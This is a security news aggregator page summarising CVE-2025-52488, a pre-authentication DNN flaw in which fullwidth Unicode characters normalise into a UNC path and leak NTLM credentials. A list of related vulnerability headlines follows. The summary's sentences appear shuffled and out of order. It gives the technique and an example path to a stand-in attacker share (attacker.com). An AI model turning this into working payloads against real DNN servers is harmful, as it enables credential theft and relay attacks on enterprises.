CyberSecurityBoard
Sponsor Register Login

DNN Vulnerability Let Attackers Steal NTLM Credentials via Unicode Normalization Bypass

This mechanism becomes particularly dangerous when combined with functions like File.Exists, System.Net.HttpRequest, and System.Net.WebClient, which can inadvertently leak NTLM credentials to malicious servers. Specific Unicode characters (U+FF0E, U+FF3C) normalize into dots and backslashes after passing security validation, bypassing protection mechanisms. The pre-authentication nature of this vulnerability makes it particularly dangerous, as it requires no user credentials to exploit and can compromise domain credentials through NTLM relay attacks. The vulnerability, tracked as CVE-2025-52488, affects one of the oldest open-source content management systems and demonstrates how defensive coding measures can be circumvented through clever exploitation of Windows and .NET quirks. This normalization process converts Unicode characters to ASCII equivalents, effectively bypassing all previously implemented security measures. CVE-2025-52488 in DNN allows attackers to steal NTLM credentials without requiring user authentication. When processed, this becomes: \\attacker.com\share\file.jpg, triggering an SMB connection that leaks NTLM credentials to the attacker’s Responder server. Enables NTLM credential theft affecting enterprises and demonstrating how defensive coding can be circumvented through character encoding. These characters allow attackers to construct malicious filenames that appear safe during initial validation but transform into UNC paths after normalization. However, these security checks occur before the crucial Utility.ConvertUnicodeChars function.

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 16:30:21 +0000


Cyber News related to DNN Vulnerability Let Attackers Steal NTLM Credentials via Unicode Normalization Bypass

DNN Vulnerability Let Attackers Steal NTLM Credentials via Unicode Normalization Bypass - This mechanism becomes particularly dangerous when combined with functions like File.Exists, System.Net.HttpRequest, and System.Net.WebClient, which can inadvertently leak NTLM credentials to malicious servers. Specific Unicode characters (U+FF0E, ...
1 week ago Cybersecuritynews.com CVE-2025-52488
CVE-2021-42574 - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic ...
2 years ago
Windows NTLM hash leak flaw exploited in phishing attacks on governments - A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. In attacks seen by Check Point, phishing emails were sent to ...
2 months ago Bleepingcomputer.com CVE-2025-24054
CVE-2023-41889 - SHIRASAGI is a Content Management System. Prior to version 1.18.0, SHIRASAGI is vulnerable to a Post-Unicode normalization issue. This happens when a logical validation or a security check is performed before a Unicode normalization. The Unicode ...
1 year ago
New Email Scam Targets NTLM Hashes in Covert Data Theft Operation - TA577 has been identified as a notorious threat actor who orchestrated a sophisticated phishing campaign, according to researchers at security firm Proofpoint. Currently, the group is utilizing a new method of phishing involving ZIP archive ...
1 year ago Cysecurity.news Black Basta
CVE-2021-42694 - ** DISPUTED ** An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually ...
2 years ago
New Windows zero-day leaks NTLM hashes, gets unofficial patch - In recent months, 0patch has reported three other zero-day vulnerabilities that Microsoft patched or has yet to address, including a Windows Theme bug (patched as CVE-2025-21308), a Mark of the Web bypass on Server 2012 (still a zero-day without an ...
3 months ago Bleepingcomputer.com CVE-2025-21308
Windows 11 to let admins mandate SMB encryption for outbound connections - Windows 11 will let admins mandate SMB client encryption for all outbound connections, starting with today's Windows 11 Insider Preview Build 25982 rolling out to Insiders in the Canary Channel. SMB encryption provides data end-to-end encryption and ...
1 year ago Bleepingcomputer.com
Credentials are Still King: Leaked Credentials, Data Breaches and Dark Web Markets - Infostealers infect computers, steal all of the credentials saved in the browser along with active session cookies and other data, then export it back to command and control infrastructure before, in some cases, self-terminating. This article will ...
1 year ago Bleepingcomputer.com
Russian-Backed Hackers Target High-Value US, European Entities - Hackers linked to Russia's military intelligence unit exploited previously patched Microsoft vulnerabilities in a massive phishing campaign against U.S. and European organizations in such vectors as government, aerospace, and finance across North ...
1 year ago Securityboulevard.com CVE-2023-23397 CVE-2023-38831 Fancy Bear APT28
Microsoft Exchange Server Flaw Exploited as a Zero-Day Bug - Microsoft has identified one of the critical vulnerabilities in Exchange Server that the company disclosed in February's Patch Tuesday update as actually being a zero-day threat that attackers are already actively exploiting. CVE-2024-21410 is an ...
1 year ago Darkreading.com CVE-2024-21410 CVE-2024-2140 CVE-2024-21412 CVE-2024-21351 Fancy Bear
How to Set Up a Network Research Lab for Malware Analysis - To analyze a security vulnerability in Outlook, a controlled environment can be set up using a virtual machine within a local virtual private network. Researchers can learn more about the exploit by making a proof-of-concept and testing its ...
1 year ago Cybersecuritynews.com CVE-2024-21413
CVE-2024-45412 - Yeti bridges the gap between CTI and DFIR practitioners by providing a Forensics Intelligence platform and pipeline. Remote user-controlled data tags can reach a Unicode normalization with a compatibility form NFKD. Under Windows, such normalization ...
9 months ago
Week in review: 15 million Trello users' scraped data on sale, attackers can steal NTLM hashes - The reality of hacking threats in connected car systemsIn this Help Net Security interview, Ivan Reedman, Director of Secure Engineering at IOActive, discusses how manufacturers, government regulations, and consumers are adapting to these new ...
1 year ago Helpnetsecurity.com Cozy Bear
Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing - PoC Released - Security researchers have released a proof-of-concept exploit demonstrating this high-severity flaw, which Microsoft patched in its March 2025 updates. Security experts recommend keeping all Microsoft products updated and implementing additional ...
3 months ago Cybersecuritynews.com
Microsoft drops SMB1 firewall rules in new Windows 11 build - Windows 11 will no longer add SMB1 Windows Defender Firewall rules when creating new SMB shares starting with today's Canary Channel Insider Preview Build 25992 build. Before this change and since Windows XP SP2, creating SMB shares set up firewall ...
1 year ago Bleepingcomputer.com
CVE-2025-52487 - DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 7.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted request or proxy to be created that could bypass the design of ...
3 weeks ago
Veeam warns of critical bugs in Veeam ONE monitoring platform - Veeam released hotfixes today to address four vulnerabilities in the company's Veeam ONE IT infrastructure monitoring and analytics platform, two of them critical. The company assigned almost maximum severity ratings to the critical security flaws ...
1 year ago Bleepingcomputer.com CVE-2023-38547 CVE-2023-38549 CVE-2023-41723 FIN7 Cuba
Content Credentials Show Promise, But Ecosystem Still Young - It's a good start, but an end-to-end workflow requires more: Cameras or smartphones to generate signed images, support for Content Credentials in a wide variety of image-editing software, and the ability to view authenticated metadata on social ...
4 months ago Darkreading.com
CVE-2010-4746 - Multiple memory leaks in the normalization functionality in 389 Directory Server before 1.2.7.5 allow remote attackers to cause a denial of service (memory consumption) via "badly behaved applications," related to (1) Slapi_Attr mishandling ...
14 years ago
CVE-2016-2561 - Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.4.x before 4.4.15.5 and 4.5.x before 4.5.5.1 allow remote authenticated users to inject arbitrary web script or HTML via (1) normalization.php or (2) js/normalization.js in the ...
8 years ago
Hackers Exploiting NTLM Spoofing Vulnerability in the Wild - CVE-2025-24054 specifically involves the external control of file names or paths in Windows, allowing malicious actors to trigger SMB (Server Message Block) authentication requests that leak NTLMv2-SSP hashes during routine file operations. Check ...
2 months ago Cybersecuritynews.com CVE-2025-24054
Week in review: Attackers use phishing emails to steal NTLM hashes, Patch Tuesday forecast - What organizations need to know about the Digital Operational Resilience ActIn this Help Net Security interview, Kris Lovejoy, Global Security and Resilience Leader at Kyndryl, discusses the impact of the Digital Operational Resilience Act on ...
1 year ago Helpnetsecurity.com
CVE-2012-3482 - Fetchmail 5.0.8 through 6.3.21, when using NTLM authentication in debug mode, allows remote NTLM servers to (1) cause a denial of service (crash and delayed delivery of inbound mail) via a crafted NTLM response that triggers an out-of-bounds read in ...
12 years ago
Apache Pinot Vulnerability Let Attackers Bypass Authentication - With 78% of data breaches originating from authentication bypass flaws according to IBM’s 2025 Threat Intelligence Index, this vulnerability serves as a critical reminder to prioritize input validation in distributed architectures. Cyber Security ...
4 months ago Cybersecuritynews.com CVE-2024-35253

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)